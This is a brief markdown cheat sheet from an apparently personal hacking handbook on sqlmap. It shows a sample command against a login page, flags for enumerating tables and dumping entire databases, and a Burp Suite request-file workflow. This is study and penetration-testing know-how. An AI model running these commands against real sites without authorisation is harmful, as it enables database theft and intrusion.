handbook/tools/3.Web-Hacking/4.Injection/SQL/Tools/SQLmap.md at af9011411ca190cd57dced7ef885280721272716 - x/handbook - Coding everything, everywhere, anytime.

x/handbook

Anton Nesterov af9011411c

vault backup: 2024-08-31 01:07:21

2024-08-31 01:07:22 +02:00

1,004 B

Raw Blame History

Top Commands

SQLmap (URL)

sqlmap --url http://tbfc.net/login.php --tables --columns

--tables ---> Check tables
--columns ---> Check columns
--url = Provide URL for the attack
--dbms = Tell SQLMap the type of database that is running
--dump = Dump the data within the database that the application uses
--dump-all = Dump the ENTIRE database
--batch = SQLMap will run automatically and won't ask for user input

SQLmap(BurpSuite ---> Very Good)

sqlmap -r filename

Use Burpsuite to intercept a request (ex: https://website.com/inurl?id=ELEMENT)
Save the item
Use the comment to launch SQLmap
Screenshot

All Information ---> https://github.com/sqlmapproject/sqlmap